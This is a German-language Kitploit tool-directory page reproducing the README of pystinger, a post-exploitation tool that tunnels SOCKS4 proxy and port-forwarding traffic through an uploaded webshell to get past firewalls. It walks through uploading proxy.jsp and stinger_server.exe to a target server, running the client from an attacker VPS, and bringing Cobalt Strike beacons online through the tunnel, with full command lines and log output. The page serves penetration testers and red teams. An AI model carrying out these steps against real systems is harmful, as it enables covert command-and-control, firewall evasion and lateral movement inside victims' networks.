Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
pystinger — Firewall-Umgehung für die Verkehrsweiterleitung mittels Webshell | Kitploit
Tools/GitHubGitHub/funnywolf/pystinger
Exploit-FrameworksPayload-GenerierungIDS/IPS-UmgehungLaterale BewegungWebanwendungs-ExploitationPenetrationstestsCommand and ControlRed Teaming
GitHubfunnywolf/pystinger

pystinger

Firewall-Umgehung für die Verkehrsweiterleitung mittels Webshell

Repository anzeigen
1.4k20418vor 5 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

pystinger

Englisch | 简体中文

Pystinger implementiert SOCK4-Proxy und Portweiterleitung über eine Webshell.

Es kann direkt von metasploit-framework, viper, cobalt strike für den Online-Betrieb von Sessions verwendet werden.

Pystinger ist in Python entwickelt und unterstützt derzeit drei Proxy-Skripte: php, jsp(x) und aspx.

Verwendung

Angenommen, der Domainname des Servers ist http://example.com :8080 Die Intranet-IP-Adresse des Servers ist 192.168.3.11

SOCK4-Proxy

  • proxy.jsp Auf den Zielserver hochladen und sicherstellen, dass http://example.com:8080/proxy.jsp erreichbar ist, die Seite gibt UTF-8 zurück
  • stinger_server.exe Auf den Zielserver hochladen, AntSword cmd ausführen: start D:/XXX/stinger_server.exe um pystinger-server zu starten

Führen Sie D:/xxx/singer_server.exe nicht direkt aus, da dies zu einer TCP-Trennung führt.

  • Führen Sie auf Ihrem VPS ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000 aus
  • Sie werden die folgende Ausgabe sehen
root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 127.0.0.1:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
  • Jetzt haben Sie einen socks4a-Proxy auf dem VPS 127.0.0.1:60000 für das Intranet von example.com gestartet.
  • Jetzt ist der Zielserver(example.com) 127.0.0.1:60020 auf den VPS 127.0.0.1:60020 gemappt.

cobaltstrike Beacon online für einzelnes Ziel

  • proxy.jsp Auf den Zielserver hochladen und sicherstellen, dass http://example.com:8080/proxy.jsp erreichbar ist, die Seite gibt UTF-8 zurück
  • stinger_server.exe Auf den Zielserver hochladen, AntSword cmd ausführen: start D:/XXX/stinger_server.exe um pystinger-server zu starten

Führen Sie D:/xxx/singer_server.exe nicht direkt aus, da dies zu einer TCP-Trennung führt.

  • Führen Sie auf Ihrem VPS ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000 aus
  • Sie werden die folgende Ausgabe sehen
root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 127.0.0.1:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
  • Fügen Sie in Cobaltstrike einen Listener hinzu, Listener-Port ist 60020 (Handler/LISTEN-Port in der RAT CONFIG der Ausgabe), Listener-Adresse ist 127.0.0.1
  • Payload generieren, auf das Ziel hochladen und ausführen.

cobaltstrike Beacon online für mehrere Ziele

Tool herunterladen